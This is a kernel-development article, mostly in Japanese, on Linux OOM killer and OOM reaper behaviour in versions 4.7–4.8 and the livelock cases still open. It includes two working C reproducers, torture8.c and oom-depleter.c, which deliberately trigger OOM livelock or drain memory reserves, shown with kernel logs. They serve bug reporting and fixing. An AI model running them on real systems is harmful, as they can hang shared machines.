その反省から、 Linux 4.7 では全てのスレッドグループの oom_score_adj を -1000 に設定する代わりに、 mm_struct に対して MMF_OOM_REAPED というフラグをセットするように変更されました。このように、何が起こるかを予想できない OOM 状況下の処理は、常に最悪の事態を想定して備えておくことが大切です。
ということで、 Linux 4.7 時点での、 OOM killer の流れを説明します。
(kill1) |
order が 3 以下のメモリ割り当て要求、あるいは、 __GFP_NOFAIL フラグを含むメモリ割り当て要求が行われたものの、空きメモリを確保できなかった( OOM 状態が発生した)ことにより、 out_of_memory() ( OOM killer )が呼ばれます。 |
(kill2) | カレントスレッドが既に SIGKILL シグナルを受信している場合、あるいは、カレントスレッドを含むスレッドグループが既に終了しかけている( SIGNAL_GROUP_EXIT フラグが付与されている)スレッドの場合、カレントスレッドを含むスレッドグループが mm_struct を解放することで空きメモリが生まれる可能性があるため、必要以上にプロセスを強制終了させないようにするために、カレントスレッドに TIF_MEMDIE フラグを付与します。 また、その mm_struct を使用しているスレッドグループが全て終了しかけている場合、 OOM reaper の呼び出しも行います。 その後、呼び出し元に戻ります。 __GFP_FS フラグも __GFP_NOFAIL フラグも含まないメモリ割り当て要求である場合、何もせずに呼び出し元に戻ります。 |
(kill3) | Linux 4.5 の (kill3) と同じであるため省略します。 |
(kill4) | select_bad_process() は、システム上に存在する全てのスレッドグループに対して oom_scan_process_thread() を呼び出します。 それ以外は Linux 4.5 の (kill4) と同様です。 |
(kill5) | oom_scan_process_thread() は、そのスレッドグループが OOM killer により強制終了させる候補になりうるかどうかの判断を行います。 TIF_MEMDIE フラグの有無の検査は、スレッド単位ではなく、そのスレッドを含むスレッドグループ単位で行われるようになりました。 それ以外は Linux 4.6 の (kill5) と同様です。 |
(kill6) | oom_badness() は、そのスレッドが OOM 状態にどの程度寄与しているかの判断を行います。 強制終了させることが妥当かどうかの判断に、 oom_score_adj の値が -1000 かどうかだけでなく、 MMF_OOM_REAPED フラグの有無も検査するようになりました。 それ以外は Linux 4.5 の (kill6) と同様です。 |
(kill7) | Linux 4.5 の (kill7) と同じであるため省略します。 |
(kill8) | oom_kill_process() は、実際に SIGKILL シグナルを送信して強制終了させるための処理を行います。 まず、既に終了しかけているスレッドグループの場合、そのスレッドグループが mm_struct を解放することで空きメモリが生まれる可能性があるため、必要以上にプロセスを強制終了させないようにするために、そのスレッドに TIF_MEMDIE フラグを付与します。 また、その mm_struct を使用しているスレッドグループが全て終了しかけている場合、 OOM reaper の呼び出しも行います。 その後、呼び出し元に戻ります。 |
(kill9) | Linux 4.5 の (kill9) と同じであるため省略します。 |
(kill10) | Linux 4.6 の (kill10)と同じであるため省略します。 |
(kill11) | mmap_sem の取得に成功した場合、 oom_score_adj に -1000 を設定する代わりに、その mm_struct に対して MMF_OOM_REAPED というフラグを設定しています。 それ以外は Linux 4.6 の (kill11) と同様です。 |
Linux 4.6 時点では、 mmap() を使うことで down_write(&mm->mmap_sem) による競合を発生させ、 OOM reaper の動作を妨害することで OOM livelock 状態を発生させることができていました。そのため、 Linux 4.7 では down_write_killable() が導入され、 down_write(&mm->mmap_sem) が down_write_killable(&mm->mmap_sem) に置き換えられたことで、 exit_mm() 内の down_read(&mm->mmap_sem) で動けなくなる可能性がかなり減少しました。
それでも、 down_write_killable(&mm->mmap_sem) から up_write(&mm->mmap_sem) までの間の unkillable wait で動けなくなる可能性は残っています。例えば、以下のようなプログラムを実行した場合に発生します。
---------- torture8.c ---------- #define _GNU_SOURCE #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> #include <signal.h> #include <poll.h> #include <sched.h> #include <sys/prctl.h> #include <sys/wait.h> #include <sys/mman.h> static int memory_eater(void *unused) { const int fd = open("/proc/self/exe", O_RDONLY); srand(getpid()); while (1) { int size = rand() % 1048576; void *ptr = mmap(NULL, size, PROT_READ, MAP_PRIVATE, fd, 0); munmap(ptr, size); } return 0; } static int self_killer(void *unused) { srand(getpid()); poll(NULL, 0, rand() % 1000); kill(getpid(), SIGKILL); return 0; } static void child(void) { static char *stack[256] = { }; char buf[32] = { }; int i; int fd = open("/proc/self/oom_score_adj", O_WRONLY); write(fd, "1000", 4); close(fd); snprintf(buf, sizeof(buf), "tgid=%u", getpid()); prctl(PR_SET_NAME, (unsigned long) buf, 0, 0, 0); for (i = 0; i < 256; i++) stack[i] = malloc(4096 * 2); for (i = 1; i < 256 - 2; i++) if (clone(memory_eater, stack[i] + 8192, CLONE_THREAD | CLONE_SIGHAND | CLONE_VM, NULL) == -1) _exit(1); if (clone(memory_eater, stack[i++] + 8192, CLONE_VM, NULL) == -1) _exit(1); if (clone(self_killer, stack[i] + 8192, CLONE_THREAD | CLONE_SIGHAND | CLONE_VM, NULL) == -1) _exit(1); _exit(0); } int main(int argc, char *argv[]) { static cpu_set_t set = { { 1 } }; sched_setaffinity(0, sizeof(set), &set); if (fork() > 0) { char *buf = NULL; unsigned long size; unsigned long i; sleep(1); for (size = 1048576; size < 512UL * (1 << 30); size <<= 1) { char *cp = realloc(buf, size); if (!cp) { size >>= 1; break; } buf = cp; } /* Will cause OOM due to overcommit */ for (i = 0; i < size; i += 4096) buf[i] = 0; while (1) pause(); } while (1) if (fork() == 0) child(); else wait(NULL); return 0; } ---------- torture8.c ----------
---------- Example output start ---------- [ 156.182149] oom_reaper: reaped process 13333 (tgid=13079), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB [ 157.113150] oom_reaper: reaped process 4372 (tgid=4118), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB [ 157.995910] oom_reaper: reaped process 11029 (tgid=10775), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB [ 158.181043] oom_reaper: reaped process 11285 (tgid=11031), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB [ 169.049766] oom_reaper: reaped process 11541 (tgid=11287), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB [ 169.323695] oom_reaper: reaped process 11797 (tgid=11543), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB [ 176.294340] oom_reaper: reaped process 12309 (tgid=12055), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB [ 240.458346] MemAlloc-Info: stalling=16 dying=1 exiting=1 victim=0 oom_count=729 [ 241.950461] MemAlloc-Info: stalling=16 dying=1 exiting=1 victim=0 oom_count=729 [ 301.956044] MemAlloc-Info: stalling=19 dying=1 exiting=1 victim=0 oom_count=729 [ 303.654382] MemAlloc-Info: stalling=19 dying=1 exiting=1 victim=0 oom_count=729 [ 349.771068] oom_reaper: reaped process 13589 (tgid=13335), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB [ 349.996636] oom_reaper: reaped process 13845 (tgid=13591), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB [ 350.704767] oom_reaper: reaped process 14357 (tgid=14103), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB [ 351.656833] Out of memory: Kill process 5652 (tgid=5398) score 999 or sacrifice child [ 351.659127] Killed process 5652 (tgid=5398) total-vm:6348kB, anon-rss:1116kB, file-rss:12kB, shmem-rss:0kB [ 352.664419] oom_reaper: unable to reap pid:5652 (tgid=5398) [ 357.238418] oom_reaper: unable to reap pid:5652 (tgid=5398) [ 358.621747] oom_reaper: unable to reap pid:5652 (tgid=5398) [ 359.970605] oom_reaper: unable to reap pid:5652 (tgid=5398) [ 361.423518] oom_reaper: unable to reap pid:5652 (tgid=5398) [ 362.704023] oom_reaper: unable to reap pid:5652 (tgid=5398) [ 363.832115] MemAlloc-Info: stalling=1 dying=3 exiting=1 victim=1 oom_count=25279 [ 364.148948] MemAlloc: tgid=5398(5652) flags=0x400040 switches=266 dying victim [ 364.150851] tgid=5398 R running task 12920 5652 1 0x00100084 [ 364.152773] ffff88000637fbe8 ffffffff8172b257 000091fa78a0caf8 ffff8800389de440 [ 364.154843] ffff880006376440 ffff880006380000 ffff880078a0caf8 ffff880078a0caf8 [ 364.156898] ffff880078a0cb10 ffff880078a0cb00 ffff88000637fc00 ffffffff81725e1a [ 364.158972] Call Trace: [ 364.159979] [<ffffffff8172b257>] ? _raw_spin_unlock_irq+0x27/0x50 [ 364.161691] [<ffffffff81725e1a>] schedule+0x3a/0x90 [ 364.163170] [<ffffffff8172a366>] rwsem_down_write_failed+0x106/0x220 [ 364.164925] [<ffffffff813bd2c7>] call_rwsem_down_write_failed+0x17/0x30 [ 364.166737] [<ffffffff81729877>] down_write+0x47/0x60 [ 364.168258] [<ffffffff811c3284>] ? vma_link+0x44/0xc0 [ 364.169773] [<ffffffff811c3284>] vma_link+0x44/0xc0 [ 364.171255] [<ffffffff811c5c05>] mmap_region+0x3a5/0x5b0 [ 364.172822] [<ffffffff811c6204>] do_mmap+0x3f4/0x4c0 [ 364.174324] [<ffffffff811a64dc>] vm_mmap_pgoff+0xbc/0x100 [ 364.175894] [<ffffffff811c4060>] SyS_mmap_pgoff+0x1c0/0x290 [ 364.177499] [<ffffffff81002c91>] ? do_syscall_64+0x21/0x170 [ 364.179118] [<ffffffff81022b7d>] SyS_mmap+0x1d/0x20 [ 364.180592] [<ffffffff81002ccc>] do_syscall_64+0x5c/0x170 [ 364.182140] [<ffffffff8172b9da>] entry_SYSCALL64_slow_path+0x25/0x25 [ 364.183855] oom_reaper: unable to reap pid:5652 (tgid=5398) [ 365.199023] MemAlloc-Info: stalling=1 dying=3 exiting=1 victim=1 oom_count=28254 [ 366.283955] oom_reaper: unable to reap pid:5652 (tgid=5398) [ 368.158264] oom_reaper: unable to reap pid:5652 (tgid=5398) [ 369.568325] oom_reaper: unable to reap pid:5652 (tgid=5398) [ 371.416533] oom_reaper: unable to reap pid:5652 (tgid=5398) [ 373.159185] oom_reaper: unable to reap pid:5652 (tgid=5398) [ 374.835808] oom_reaper: unable to reap pid:5652 (tgid=5398) [ 376.386226] oom_reaper: unable to reap pid:5652 (tgid=5398) [ 378.223962] oom_reaper: unable to reap pid:5652 (tgid=5398) [ 379.601584] oom_reaper: unable to reap pid:5652 (tgid=5398) [ 381.067290] oom_reaper: unable to reap pid:5652 (tgid=5398) [ 382.394818] oom_reaper: unable to reap pid:5652 (tgid=5398) [ 383.918460] oom_reaper: unable to reap pid:5652 (tgid=5398) [ 385.540088] oom_reaper: unable to reap pid:5652 (tgid=5398) [ 386.915094] oom_reaper: unable to reap pid:5652 (tgid=5398) [ 388.297575] oom_reaper: unable to reap pid:5652 (tgid=5398) [ 391.598638] oom_reaper: unable to reap pid:5652 (tgid=5398) [ 393.580423] oom_reaper: unable to reap pid:5652 (tgid=5398) [ 395.744709] oom_reaper: unable to reap pid:5652 (tgid=5398) [ 397.377497] oom_reaper: unable to reap pid:5652 (tgid=5398) [ 399.614030] oom_reaper: unable to reap pid:5652 (tgid=5398) [ 401.103803] oom_reaper: unable to reap pid:5652 (tgid=5398) [ 402.484887] oom_reaper: unable to reap pid:5652 (tgid=5398) [ 404.503755] oom_reaper: unable to reap pid:5652 (tgid=5398) [ 406.433219] oom_reaper: unable to reap pid:5652 (tgid=5398) [ 407.958772] oom_reaper: unable to reap pid:5652 (tgid=5398) [ 410.094990] oom_reaper: unable to reap pid:5652 (tgid=5398) [ 413.509253] oom_reaper: unable to reap pid:5652 (tgid=5398) [ 416.820991] oom_reaper: unable to reap pid:5652 (tgid=5398) [ 420.485121] oom_reaper: unable to reap pid:5652 (tgid=5398) [ 422.302336] oom_reaper: unable to reap pid:5652 (tgid=5398) [ 424.623738] oom_reaper: unable to reap pid:5652 (tgid=5398) [ 425.204811] MemAlloc-Info: stalling=13 dying=3 exiting=1 victim=0 oom_count=161064 [ 425.592191] MemAlloc-Info: stalling=13 dying=3 exiting=1 victim=0 oom_count=161064 [ 430.507619] oom_reaper: unable to reap pid:5652 (tgid=5398) [ 432.487807] oom_reaper: unable to reap pid:5652 (tgid=5398) [ 436.810127] oom_reaper: unable to reap pid:5652 (tgid=5398) [ 439.310553] oom_reaper: unable to reap pid:5652 (tgid=5398) [ 441.404857] oom_reaper: unable to reap pid:5652 (tgid=5398) ---------- Example output end ----------
しかし、 mmap_sem を排他モードで取得している間に呼び出されうる全ての処理を killable に書き直すのは、エラーハンドリングが複雑になりすぎるので、現実的ではありません。そのため、 Linux 4.8 では OOM reaper が mmap_sem を共有モードで取得できない状態が2回発生した場合、既に OOM reaper による回収が済んだものとして扱われるようになります。
ということで、 Linux 4.8-rc1 時点での、 OOM killer の流れを説明します。
(kill1) | Linux 4.7 の (kill1) と同じであるため省略します。 |
(kill2) | カレントスレッドがまだ mm_struct を解放しておらず、その mm_struct を使用しているスレッドグループが全て終了しかけている( SIGNAL_GROUP_EXIT フラグまたは PF_EXITING フラグが付与されている)場合、その mm_struct を解放することで空きメモリが生まれる可能性があるため、必要以上にプロセスを強制終了させないようにするために、カレントスレッドに TIF_MEMDIE フラグを付与し、 OOM reaper の呼び出しを行います。 それ以外は Linux 4.7 の (kill2) と同様です。 |
(kill3) | Linux 4.5 の (kill3) と同じであるため省略します。 |
(kill4) | Linux 4.7 の (kill4) と同じであるため省略します。 |
(kill5) | oom_scan_process_thread() は、そのスレッドグループが OOM killer により強制終了させる候補になりうるかどうかの判断を行います。 そのスレッドグループ内に TIF_MEMDIE フラグが付与されたスレッドが存在している場合、 MMF_OOM_REAPED フラグの有無を検査します。そして、 MMF_OOM_REAPED フラグが付与されている場合、そのスレッドグループを無視します。 それ以外は Linux 4.7 の (kill5) と同様です。 |
(kill6) | oom_badness() は、そのスレッドが OOM 状態にどの程度寄与しているかの判断を行います。 強制終了させることが妥当かどうかの判断に、 oom_score_adj の値と MMF_OOM_REAPED フラグの有無だけでなく、そのスレッドが vfork() により作成されたかどうか検査するようになりました。これは、 vfork() により作成された子プロセスは、親プロセスが使用している mm_struct を共有しているだけなので、 vfork() により作成された子プロセスを強制終了させてもほとんど意味が無いという推測に基づいています。(Trap 9) それ以外は Linux 4.7 の (kill6) と同様です。 |
(kill7) | Linux 4.5 の (kill7) と同じであるため省略します。 |
(kill8) | oom_kill_process() は、実際に SIGKILL シグナルを送信して強制終了させるための処理を行います。 そのスレッドがまだ mm_struct を解放しておらず、その mm_struct を使用しているスレッドグループが全て終了しかけている場合、その mm_struct を解放することで空きメモリが生まれる可能性があるため、必要以上にプロセスを強制終了させないようにするために、そのスレッドに TIF_MEMDIE フラグを付与し、 OOM reaper の呼び出しを行い、呼び出し元に戻ります。 |
(kill9) | Linux 4.5 の (kill9) と同じであるため省略します。 |
(kill10) | その mm_struct を使用している他のスレッドグループに対しても、 OOM killer により強制終了させることが妥当なスレッドグループであれば SIGKILL シグナルを送信します。この際、 oom_score_adj の値は無視します。これは、( oom_score_adj の値は /proc/$pid/oom_score_adj から変更できますが、)同じ mm_struct を共有している複数の $pid が異なる oom_score_adj の値を持っている状態を認める理由が見当たらないという推測により、( vfork() された場合を除いて)同じ mm_struct を共有しているスレッドグループ間では同じ oom_score_adj の値を共有するように修正されたためです。(Trap 10) また、 mm_struct を共有しているのが(終了するとカーネルパニックが発生する) init プロセスまたは(強制終了させるのが妥当ではない)カーネルスレッドの場合、 OOM reaper を呼び出すことができません。 OOM reaper を呼び出すことができないことにより OOM livelock 状態に陥るのを回避するため、その mm_struct に対して MMF_OOM_REAPED フラグをセットすることで、 (kill5) の検査において、その mm_struct が無視されるようにします。(Trap 11) それ以外はLinux 4.6 の (kill10) と同様です。 |
(kill11) | mmap_sem の取得に2回失敗した場合、その mm_struct に対して MMF_OOM_REAPED というフラグを設定します。 それ以外は Linux 4.7 の (kill11) と同様です。 |
せっかく「 OOM killer が発動できた場合に OOM livelock 状態に陥る」問題への対処を始めたのだから、単に OOM livelock 状態に陥る確率を減らすだけでなく、 OOM killer が発動できる限りは OOM livelock 状態に陥らないことを証明できるようにしたいですよね?ですので、 Linux 4.8 では、証明できるようになることを目指して現在進行中です。
Linux 4.6 までの task_will_free_mem() はスレッド単位、 Linux 4.7 ではスレッドグループ単位での検査を行っていましたが、 Linux 4.8 では mm_struct 単位での検査を行うようになります。しかし、スレッド単位かスレッドグループ単位か mm_struct 単位かを問わず、同じスレッドに対して out_of_memory() から task_will_free_mem() のショートカットを永遠に利用できるようになっている限り、 OOM livelock 状態が発生する可能性が残ってしまいます。そのため、 Linux 4.8 では、 (kill2) において、既に OOM reaper による回収が済んでいる場合には task_will_free_mem() のショートカットを利用できないように変更されます。
さて、果たして Linux 4.8 で OOM livelock 状態に陥らないことを証明できるようになるのでしょうか?その答えは、「残念ながら」です。ということで、残りの罠について説明します。
(Trap 9)は、メモリ消費の大部分は mm_struct に関連付けされているという前提に起因します。 oom_score_adj の使われ方として、「 OOM killer により強制終了させられない( oom_score_adj の値が -1000 に設定されている)状態にある親プロセスが vfork() により子プロセスを作成し、子プロセスを OOM killer により強制終了させることができる( oom_score_adj の値が 0 に設定されている)状態に変更した上で、子プロセスが execve() システムコールを用いてプログラムを実行する」というケースが存在しているため、 vfork() により作成された子プロセスは親プロセスとは異なる oom_score_adj の値を持つことを認めるという例外を設けています。しかし、 CVE-2010-4243 で示されたように、 execve() システムコールの argv[]/envp[] 引数として、相当な量のメモリを mm_struct に関連付けずに消費することは vfork() により作成された子プロセスでも可能です。そのため、 vfork() により作成された子プロセスを強制終了の対象外とするという判断は、常に望ましいとは限りません。しかし、 Michal Hocko さんは「そのような間抜けな処理を許す方が悪い」という考え方であるため、そのまま採用されてしまいました。
(Trap 10)は、「超ひねくれ者のマルチスレッド」が原因で OOM reaper を起動できないことにより OOM livelock 状態に陥るのを回避するためのものです。親プロセスと vfork() により作成された子プロセスとで OOM killer により強制終了させられるかどうかが異なる場合も、「超ひねくれ者のマルチスレッド」と考えることができます。しかし、そもそも「ひねくれ者のマルチスレッド」を作成するプログラムには、何らかの理由がある筈です。例えば、 OOM killer が発動するギリギリ直前の状況を試験するために「超ひねくれ者のマルチスレッド」として動作するプログラムが存在する可能性は否定できないのです。
(Trap 11)は、 OOM killer が発動できる限りは OOM livelock 状態に陥らないことを証明できていない、唯一の箇所です。
OOM reaper を呼び出すことができなかった場合でも OOM livelock 状態に陥るのを回避する方法としては、メモリ回収処理を行っても安全かどうかの判断を OOM reaper に委任することで、「 OOM killer が TIF_MEMDIE フラグを付与するのと常にセットで OOM reaper を呼び出すようにする」方法が考えられます。しかし、 Michal Hocko さんは「メモリ回収処理を行えないことが明らかな場合には、 OOM reaper に処理を引き継がずに OOM killer 内で対処したい」という考え方であるため、この方法を拒み続けています。
「 OOM reaper に処理を引き継がずに OOM killer 内で対処する」方法としては、 (kill10) において MMF_OOM_REAPED フラグを設定するのと一緒に (kill9) において付与された TIF_MEMDIE フラグをクリアするという方法が考えられます。 Linux 4.6 で OOM reaper が TIF_MEMDIE フラグをクリアするという挙動をするようになったとき、サスペンド機能との競合問題を回避するために OOM reaper のカーネルスレッドを freezable にするという変更も採用されました。しかし、その後の調査で、カーネルスレッドを freezable にしてもサスペンド機能との競合問題を回避できていなかったことが判明しました。そして、「サスペンド機能との競合問題を回避するためのパッチを使わずに済ませたいので、 OOM reaper や OOM killer が TIF_MEMDIE フラグをクリアするという挙動は避けたい」という考え方になったため、 (kill10) において TIF_MEMDIE フラグをクリアするという方法も拒み続けています。
その結果、 Linux 4.8 で採用されることになっているのが、 (kill5) の検査において、 TIF_MEMDIE フラグが付与されていても MMF_OOM_REAPED フラグも付与されている場合、その mm_struct を無視するという挙動です。しかし、 (kill5) の検査において、 TIF_MEMDIE フラグが付与されたスレッドを含むスレッドグループが使用している mm_struct を取得するために呼び出している find_lock_task_mm() 関数は、そのスレッドグループの全てのスレッドが mm_struct を解放した後は取得できないという問題があります。この問題に対処する方法としては、 TIF_MEMDIE フラグが付与されたスレッドを含むスレッドグループが使用している mm_struct を find_lock_task_mm() 関数で取得できなかった場合、 OOM_SCAN_ABORT ではなく OOM_SCAN_CONTINUE を返却するという方法が考えられます。しかし、「 Linux 4.8 で急いで対処する必要性がある話ではない」という考え方であるため、この方法も拒否されました。その結果、 TIF_MEMDIE フラグが付与されたスレッドを含むスレッドグループが使用している mm_struct を find_lock_task_mm() 関数で取得できなかった場合は OOM_SCAN_ABORT が返却されるため、僅かではありますが OOM livelock 状態に陥る可能性が残ってしまった訳です。(残念!)
ちなみに、 OOM reaper は MMU 対応カーネル( CONFIG_MMU=y というカーネルコンフィグを指定してコンパイルされるカーネル)でのみ利用可能です。 MMU 非対応カーネル( CONFIG_MMU=y というカーネルコンフィグを指定しないでコンパイルされるカーネル)では OOM reaper を利用できないため、 MMU 非対応カーネルに関しては、「 OOM killer が発動できた場合に OOM livelock 状態に陥る」問題が発生しないことを証明するどころか、全く改善されていません。誰も MMU 非対応カーネルでの動作テストをしないため、もしかすると、 MMU 対応カーネルのための修正により、 MMU 非対応カーネルで OOM livelock 状態が発生しやすくなっている可能性さえあります。 MMU 非対応カーネルでも使える方法としてタイムアウトを使う方法も考えられますが、 Michal Hocko さんは「そもそも MMU 非対応環境で OOM livelock が発生した事例を聞いたことが無い( MMU 非対応環境では OOM livelock を引き起こすような無茶なメモリの使い方をさせない筈だ)」という考え方であるため、対処される見通しはありません。
そろそろ「 OOM killer が発動できた場合に OOM livelock 状態に陥る」という問題は終わらせて、「 OOM killer が発動できないまま OOM livelock 状態に陥る」というとっても厄介な問題への対処に注力してほしいものです。
Like I explained at timeout-based workarounds, we will be able to avoid OOM livelock situation if we are allowed to invoke the OOM killer based on some timeout. But so far there is no chance for accepting timeout-based judgement. And due to the existence of the "too small to fail" memory-allocation rule, we cannot do anything when OOM livelock situation occurs.
Then, at least we want to be notified of stalling memory allocation requests when OOM livelock situation might be occurring. Otherwise, we cannot tell whether the cause is related to memory allocation requests when a system hung up.
Therefore, I have been proposing Kernel Memory Allocation Watchdog (kmallocwd) functionality which monitors memory allocation requests in kernel space. (The lines like MemAlloc: in this page are output from this functionality.)
Addressing bugs caused by software resembles identifying criminal person and turning over by yourself. Since Linux kernel's memory management subsystem does not print any message when something unexpected is occurring, the skill for identifying criminal person and turning over by yourself is especially strongly required. But not all Linux users have such skill.
This functionality is an important first-step aid for isolating the problem, but there is no chance for accepting this functionality because justification / necessity of adding such large amount of operations is considered questionable. Unless more and more people reports problems as "this may be a bug related with memory management subsystem" enough to bother memory management persons, memory management persons will remain asserting innocence without knowing "what problems are occurring".
In this section, I enumerate various bugs of memory management under OOM situations which are not yet explained in sections above. For each bug, I attach reproducer program as needed.
Since SysRq-f request from keyboard is processed in interrupt context, it cannot synchronously wait for completion of the OOM killer. Therefore, SysRq-f enqueues a request to invoke the OOM killer using system_wq which is shared among the hole system, and the OOM killer is asynchronously triggered by the workqueue kernel thread. But when the workqueue is processing other requests, that workqueue cannot process the request to invoke the OOM killer.
Therefore, when the workqueues got stuck due to OOM livelock situation, the workqueue cannot invoke the OOM killer forever, and the system cannot recover from OOM livelock situation using SysRq-f request.
Since the OOM reaper was introduced, TIF_MEMDIE flag is automatically cleared by the OOM reaper, and the OOM killer can continue selecting next OOM victim. Therefore, in many cases, occurrence of OOM livelock situation is avoided.
Like I demonstrated at memset+write case, the OOM killer invoked by SysRq-f request selects next OOM victim even if there is a thread with TIF_MEMDIE flag set. But the logic of select_bad_process() simply selects a thread group with largest oom_badness() value (without taking into account whether that thread group has a thread with TIF_MEMDIE flag already set). As a result, when OOM livelock situation occurred, SysRq-f forever selects a thread with TIF_MEMDIE flag already set, and the system cannot recover from OOM livelock situation using SysRq-f request.
Since the OOM reaper was introduced, thread groups with a TIF_MEMDIE thread are automatically ignored, and the OOM killer can continue selecting next OOM victim. Therefore, in many cases, occurrence of OOM livelock situation is avoided.
Like I explained at the OOM killer's behavior, a terminating thread releases mm_struct at exit_mm() called from do_exit() and clears TIF_MEMDIE flag. Therefore, setting TIF_MEMDIE flag via task_will_free_mem(current) in out_of_memory() needs to be permitted only when the current thread has not released mm_struct.
But since such check was not performed, a child process which was killed by the OOM killer got TIF_MEMDIE flag again, and the parent process cannot reap the child process due to memory allocation request is in progress, and the TIF_MEMDIE flag set on the child process blocks memory allocation request by the parent process, and resulted in OOM livelock situation.
This bug was fixed by commit d7a94e7e11badf84 ("oom: don't count on mm-less current process") and commit 83363b917a2982dd ("oom: make sure that TIF_MEMDIE is set under task_lock").
Between Linux 3.19-rc6 and Linux 3.19-rc7, a patch named commit 9879de7373fc ("mm: page_alloc: embed OOM killing naturally into allocation slowpath") was merged. Originally the patch merely meant to be a clean up, but the patch had a side effect that makes GFP_NOFS / GFP_NOIO allocation requests not to retry (in other words, no longer apply the "too small to fail" memory-allocation rule), a completely unusable situation where ext4 filesystem gets errors by simply invoking the OOM killer occurred.
Of course, it would be the best if we can get rid of the "too small to fail" memory-allocation rule. But suddenly removing it without any preparation like a sucker punch is not acceptable. Therefore, the original behavior was restored by commit cc87317726f85153 ("mm: page_alloc: revert inadvertent !__GFP_FS retry behavior change").
Then, an attempt which limits number of retries in a memory allocation request using /proc/sys/vm/nr_alloc_retry interface was made. But since nobody actively tests the behavior of out of memory situation, there is no chance to gradually decrease the retries, and vanished in smoke. Therefore, the "too small to fail" memory-allocation rule still exists.
Instead of /proc/sys/vm/panic_on_oom interface which immediately triggers the kernel panic as soon as the OOM killer is invoked, an attempt which triggers the kernel panic only when the OOM livelock situation was not solved within a threshold period controlled by /proc/sys/vm/panic_on_oom_timeout interface after the OOM killer was invoked was made. But since we did not came to agreement on when to trigger the kernel panic, this attempt also vanished in smoke.
In the background, there was a conflict between "the system should be rebooted via the kernel panic rather than selecting next OOM victim if the OOM livelock situation was not solved within predetermined period" and "rebooting the system via the kernel panic is too much because there is possibility that selecting next OOM victim for several times can solve the OOM livelock situation".
This topic is about pointing out a flow in abovementioned commit 83363b917a2982dd ("oom: make sure that TIF_MEMDIE is set under task_lock") patch. When the patch was proposed, I commented that "We should set TIF_MEMDIE flag after sending SIGKILL signal". But at that time, my comment was rejected with "It makes no difference because the process will be terminated anyway" response. Therefore, I demonstrated how large the time window between setting TIF_MEMDIE flag and sending SIGKILL signal can become, using a fact that printing kernel messages using printk() is rather a slow operation.
---------- oom-depleter.c start ---------- #define _GNU_SOURCE #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> #include <sched.h> static int null_fd = EOF; static char *buf = NULL; static unsigned long size = 0; static int dummy(void *unused) { pause(); return 0; } static int trigger(void *unused) { read(null_fd, buf, size); /* Will cause OOM due to overcommit */ return 0; } int main(int argc, char *argv[]) { int pipe_fd[2] = { EOF, EOF }; unsigned long i; null_fd = open("/dev/zero", O_RDONLY); pipe(pipe_fd); for (size = 1048576; size < 512UL * (1 << 30); size <<= 1) { char *cp = realloc(buf, size); if (!cp) { size >>= 1; break; } buf = cp; } /* * Create many child threads in order to enlarge time lag between * the OOM killer sets TIF_MEMDIE to thread group leader and * the OOM killer sends SIGKILL to that thread. */ for (i = 0; i < 1000; i++) { clone(dummy, malloc(1024) + 1024, CLONE_SIGHAND | CLONE_VM, NULL); if (!i) close(pipe_fd[1]); } /* Let a child thread trigger the OOM killer. */ clone(trigger, malloc(4096)+ 4096, CLONE_SIGHAND | CLONE_VM, NULL); /* Wait until the first child thread is killed by the OOM killer. */ read(pipe_fd[0], &i, 1); /* Deplete all memory reserve using the time lag. */ for (i = size; i; i -= 4096) buf[i - 1] = 1; return * (char *) NULL; /* Kill all threads. */ } ---------- oom-depleter.c end ----------
---------- Example output start ---------- [ 38.613801] sysrq: SysRq : Show Memory [ 38.616506] Mem-Info: [ 38.618106] active_anon:18185 inactive_anon:2085 isolated_anon:0 [ 38.618106] active_file:10615 inactive_file:18972 isolated_file:0 [ 38.618106] unevictable:0 dirty:7 writeback:0 unstable:0 [ 38.618106] slab_reclaimable:3015 slab_unreclaimable:4217 [ 38.618106] mapped:9940 shmem:2146 pagetables:1319 bounce:0 [ 38.618106] free:378300 free_pcp:486 free_cma:0 [ 38.640475] Node 0 DMA free:9980kB min:400kB low:500kB high:600kB active_anon:2924kB inactive_anon:80kB active_file:816kB inactive_file:896kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:596kB shmem:80kB slab_reclaimable:240kB slab_unreclaimable:308kB kernel_stack:80kB pagetables:64kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no [ 38.655621] lowmem_reserve[]: 0 1731 1731 1731 [ 38.657497] Node 0 DMA32 free:1503220kB min:44652kB low:55812kB high:66976kB active_anon:69816kB inactive_anon:8260kB active_file:41644kB inactive_file:74992kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1774392kB mlocked:0kB dirty:28kB writeback:0kB mapped:39164kB shmem:8504kB slab_reclaimable:11820kB slab_unreclaimable:16560kB kernel_stack:3472kB pagetables:5212kB unstable:0kB bounce:0kB free_pcp:1944kB local_pcp:668kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no [ 38.672950] lowmem_reserve[]: 0 0 0 0 [ 38.673726] Node 0 DMA: 3*4kB (UM) 6*8kB (U) 4*16kB (UEM) 0*32kB 0*64kB 1*128kB (M) 2*256kB (EM) 2*512kB (UE) 2*1024kB (EM) 1*2048kB (E) 1*4096kB (M) = 9980kB [ 38.676854] Node 0 DMA32: 31*4kB (UEM) 27*8kB (UE) 32*16kB (UE) 13*32kB (UE) 14*64kB (UM) 7*128kB (UM) 8*256kB (UM) 8*512kB (UM) 3*1024kB (U) 4*2048kB (UM) 362*4096kB (UM) = 1503220kB [ 38.680159] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB [ 38.681517] 31733 total pagecache pages [ 38.682162] 0 pages in swap cache [ 38.682711] Swap cache stats: add 0, delete 0, find 0/0 